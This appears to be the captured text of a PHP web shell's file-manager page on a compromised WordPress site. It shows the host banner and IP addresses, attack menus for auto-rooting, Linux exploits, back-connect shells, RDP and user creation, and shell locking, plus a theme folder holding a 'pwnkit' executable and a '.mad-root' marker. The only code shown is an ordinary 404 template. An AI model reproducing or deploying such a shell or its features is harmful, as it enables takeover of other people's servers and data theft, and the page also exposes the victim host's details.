Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
formation /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.63
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
3.35
KB
-rw-r--r--
comments.php
3.15
KB
-rw-r--r--
content-aside.php
1.51
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
637
B
-rw-r--r--
content-single.php
2.28
KB
-rw-r--r--
content.php
2.58
KB
-rw-r--r--
custom-css.js
807
B
-rw-r--r--
footer.php
2.29
KB
-rw-r--r--
functions.php
18.99
KB
-rw-r--r--
functionsbak.php
18.5
KB
-rw-r--r--
header.php
4.17
KB
-rw-r--r--
image.php
5.36
KB
-rw-r--r--
index.php
1.91
KB
-rw-r--r--
license.txt
14.96
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
1.15
KB
-rw-r--r--
page.php
1.03
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
1.69
KB
-rw-r--r--
rtl.css
47.04
KB
-rw-r--r--
screenshot.png
777.66
KB
-rw-r--r--
search.php
1.11
KB
-rw-r--r--
searchform.php
637
B
-rw-r--r--
sidebar.php
1.08
KB
-rw-r--r--
single.php
1.04
KB
-rw-r--r--
style.css
47.04
KB
-rw-r--r--
wpml-config.xml
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 404.php
<?php /** * The template for displaying 404 pages (Not Found). * * @package formation * @since formation 1.0 */ get_header(); ?> <header class="entry-header"> <h1 class="page-title"><?php _e( 'Oops! That page can’t be found.', 'formation' ); ?></h1> </header><!-- .entry-header --> <div id="primary_wrap"> <div id="primary" class="content-area"> <div id="content" class="site-content" role="main"> <article id="post-0" class="post error404 not-found"> <div class="entry-content"> <p><?php _e( 'It looks like nothing was found at this location. Maybe try one of the links below or a search?', 'formation' ); ?></p> <div id="helpfullinks"> <?php get_search_form(); ?> <?php the_widget( 'WP_Widget_Recent_Posts' ); ?> <div class="widget"> <h1 class="widgettitle"><?php _e( 'Most Used Categories', 'formation' ); ?></h1> <ul> <?php wp_list_categories( array( 'orderby' => 'count', 'order' => 'DESC', 'show_count' => 1, 'title_li' => '', 'number' => 10 ) ); ?> </ul> </div><!-- .widget --> <?php /* translators: %1$s: smilie */ $archive_content = '<p>' . sprintf( __( 'Try looking in the monthly archives. %1$s', 'formation' ), convert_smilies( ':)' ) ) . '</p>'; the_widget( 'WP_Widget_Archives', 'dropdown=1', "after_title=</h2>$archive_content" ); ?> <?php the_widget( 'WP_Widget_Tag_Cloud' ); ?> </div> </div><!-- .entry-content --> </article><!-- #post-0 .post .error404 .not-found --> </div><!-- #content .site-content --> </div><!-- #primary .content-area --> </div> <?php get_footer(); ?>
Close